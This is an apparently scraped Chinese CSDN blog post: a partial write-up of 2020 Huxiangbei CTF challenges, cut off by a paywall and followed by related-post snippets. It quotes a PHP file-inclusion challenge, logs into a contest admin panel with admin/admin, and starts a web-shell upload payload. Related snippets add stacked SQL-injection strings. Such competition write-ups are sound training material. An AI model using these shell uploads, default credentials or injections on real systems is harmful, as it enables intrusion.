[2020hxb] 部分wp

最新推荐文章于 2022-04-02 12:32:37 发布

Fstone2020

最新推荐文章于 2022-04-02 12:32:37 发布

阅读量376

点赞数

分类专栏： CTF 文章标签：安全

本文链接：https://blog.csdn.net/qq_42158602/article/details/109436616

版权

本文分享了在CTF比赛中遇到的Web题目，包括通过phpinfo找到漏洞，利用弱密码进入后台，以及尝试上传shell的技巧。在crypto部分，涉及维吉尼亚加密的解密过程。此外，还提到了misc类问题，涉及到流量分析、base64隐写和解密技巧。

摘要由CSDN通过智能技术生成

web

web1 题目名字不重要反正题挺简单的

就在phpinfo里面。。。。

源码放一下感觉200分没这么好拿的样子，可能有别的解法。

<?php
error_reporting(0);

//I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker.
if ( isset($_GET['file']) ) {
   
    $file = $_GET['file'];
    
    if ( $file === "phpinfo" ) {
   
        phpinfo();
        exit;
    }

    if ( preg_match('/proc/i' , $file) ) {
   
        die("private");
    }

    $file = "/var/www/html/" . $file;
    $content = file_get_contents($file);

    if ( !$content ) {
   
        die("nothing");
    }

    if ( preg_match("/script|<\?/i", $content) ) {
   
        die("bypass me");
    }

    include_once $file;

} else {
   
    highlight_file(__FILE__);
}

web4

直接/admin进入后台界面
在这里插入图片描述
弱密码
admin/admin

登录后台，直接点击不了，直接源代码里面去点

进入管理员资料管理

http://47.111.104.99:50400/admin/?r=manageinfo

上传图片

GIF89a
<script language="php">eval($_POST[

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Fstone2020

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

CTF Web题部分WP

wywwzjj

11-26

12万+

1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...

2020湖湘杯 wp

weixin_46330722的博客

11-02

1978

2020湖湘杯 wpweb题目名字不重要反正题挺简单的NewWebsite 今天打了下湖湘杯，签到选手上线。 web 题目名字不重要反正题挺简单的题目源码 <?php error_reporting(0); //I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker. if ( isset($_GET['file']) ) { $file = $_GET

参与评论您还未登录，请先登录后发表或查看评论

Tomcat远程管理Web项目Manager App

dubbo

04-09

2715

分享生活，分享快乐。 tomcat 开启manager app部署项目时，远程部署默认是关闭的，在其他服务器上无法部署，报403.需要我们开启tomcat的远程管理。步骤如下：开启tomcat服务器（进入tomcat的bin目录 ./startup.sh或者./catalina.sh start）进入tomcat页面会报403，服务器拒绝提供服务 4、根据提示，有两个地方需要修改，一...

那些年踏过的CTF坑--phpinfo~(二)

u011215939的博客

01-19

4803

曾经学过文件包含，但是没有运用过，今天刚刚好遇到CTF内容为文件包含，可以实践一下来，访问IP：http://106.75.86.18:8888 初步查看URL:http://106.75.86.18:8888/index.php?path=phpinfo.php，path这是文件包含的所特有的，既然给我phpinfo那么就先看看给我们的信息： ubuntu的系统，文件

2020湖湘杯CTF选拔赛部分wp

../../../../../../../

11-02

1958

Misc Misc1 颜文字之谜提示说颜文字夺走了flag，Wireshark打开流量包，发现了一串base64隐写编码导出转换 (｡･∀･)ﾉﾞ嗨Hi~ (＠_＠;)(＠_＠;)(＠_＠;) (+_+)?(。>︿<)_θ(。>︿<)_θ o(*￣▽￣*)ブ゜＜（＾－＾）＞(╯▽╰ )好香~~ ヽ(✿ﾟ▽ﾟ)ノ(＠＾０＾) (^^ゞΨ(￣∀￣)Ψ*★,°*:.☆(￣▽￣)/$:*.°★* 。 ~\(≧▽≦)/~o(^▽^)o(¬‿¬)(*≧︶≦))(￣▽￣* )ゞ┳━┳(╯‵

c代码-HXB测试代码

07-14

在本压缩包中，我们有两个文件：`main.c`和`README.txt`，它们与"C代码-HXB测试代码"这个主题密切相关。`main.c`是一个C语言源代码文件，通常包含程序的主要执行逻辑，而`README.txt`则可能包含关于项目、测试或代码...

181118 逆向-HXB2018（Reverse）

whklhhhh的博客

11-19

1068

这次的re难度不是太大……但是re2和re3都有点偏门，不太硬核233 但也挺有意思的 Replace upx -d脱壳，然后是一个比普通签到略复杂一点的签到题，没什么好说的要求table[input[i]] == atoi(data[2*i]+data[2*i+1])^0x19 table = [0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0...

2020湖湘杯MISC全解-writeup

BlusKing

11-02

4619

MISC1 导出index-demo.html，查看代码发现隐藏了一长串base64 使用base64隐写进行解密 key:"lorrie" 得到key说明可能存在某种隐写，是snow隐写，但用网页版的snow隐写解出来是一串乱码，于是尝试使用本地版的SNOW.EXE SNOW.EXE -p lorrie index-demo.html flag{→_→←_←←_←←_←←_← →_→→_→←_←←_←←_← →_→←_←←_←←_← ←_←←_←←_←→_→→...

内存取证-Volatility安装使用以及一些CTF比赛题目

热门推荐

Bnessy

04-02

2万+

一、简介 Volatility是一款开源内存取证框架，能够对导出的内存镜像进行分析，通过获取内核数据结构，使用插件获取内存的详细情况以及系统的运行状态。二、安装Volatility 下载源码 https://github.com/volatilityfoundation/volatility 解压 unzip volatility-master.zip 安装依赖 crypto pip2 install pycryptodome #如果安装失败，可使用以下命令切换国内源 pip2

TSCTF-J 菜鸡的第一个HTML

Lig_HossssT的博客

10-24

235

打开题目听到歌点击F12 进入bilibili 由f12看到的内容可知 flag就是歌手名的罗马音nanawoakari 顺便说一句这个题目描述就是用来生草的XDD

hxb 2017 部分题解

StriveBen的博客

12-04

598

0x00 前言作为一名菜鸡，挤出了一点时间来做了做今年的湖湘杯，快结束的时候看了看题目，就做出了三道题，和大家分享下。0x01 第一题 web200拿道题目本以为是文件上传，但是试了几个方法没成功，随便点了点，看到了url中op参数，感觉是php文件包含漏洞试了试，得到了index.php的源码0x02 使用php://filter 读取源码在使用php:filter协议获取源码时，需要注意”r

【TSCTF-J 2019】relax

qtL0ng的博客

07-01

358

打开是个没用的网站，扫描一下~ 访问/robots.txt，发现三个文件： User-agent: * Disallow: /relax.php Disallow: /heicore.php Disallow: /flag.php 其中只有/relax.php里有东西，查看源码：这个是aaencode代码，直接扔进控制台运行，或者在线解密：https://www.qtool.net/decode 整理得： $_ = $_GET['pw']; $__ = $_GET['file']; $___ =

第十三届全国大学生信息安全竞赛 2020CISCN 线上初赛Writeup

末初的CSDN博客

09-06

5601

第十三届全国大学生信息安全竞赛

一道疯狂bypass的题目

蚁景网安学院

08-29

834

SUCTF2019-easyphp

web基本解题思路

Ljt101222的博客

07-19

3735

湖湘杯 | Misc Wp

Lemon's blog

11-09

2413

前言全程卡死在验证码处，体验感爆棚 MISC

2020湖湘杯-CTF-MISC-颜文字

zippo1234的博客

11-02

2723

2020HXB-CTF-MISC-颜文字颜文字题目分析开始1.题目2.流量分析3.html分析4.base64隐写5.snow隐写6.摩尔斯结语每天一题，只能多不能少颜文字题目分析 11月1日，作为菜鸡又被湖湘杯恶心了一次，最后几个小时平台沦陷，搞得到最后成绩如何都不知道，罢了，反正也只做了几道简单的。这里分享其中一题。MISC的第一题，颜文字。 base64隐写 snow隐写摩尔斯栅栏开始 1.题目给出一个流量包 2.流量分析习惯性上手flag。内容很多，试试直接导出。得到

BUUCTF [SUCTF 2019]EasySQL

qq_42158602的博客

01-10

7531

打开界面试了一下有三种显示还有一个没有输出可以堆叠注入 1;show databases; 1;show tables; 可以看到有一个Flag表测试发现from flag都被过滤不能直接读到flag 想了很久想不到看别人wp了~ 看见听说比赛的时候原理泄漏了的 select $_GET['query'] || flag from flag 是这样 md 谁想的到啊别...

解释 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY! Someone could be eavesdropping on you right now (man-in-the-middle attack)! It is also possible that a host key has just been changed. The fingerprint for the ECDSA key sent by the remote host is SHA256:m3wBHtrT0HXb0H04qPLqemg72SavVieqXYS6WAaBlxQ. Please contact your system administrator. Add correct host key in /root/.ssh/known_hosts to get rid of this message. Offending ECDSA key in /root/.ssh/known_hosts:3 ECDSA host key for xn01 has changed and you have requested strict checking. Host key verification failed. lost connection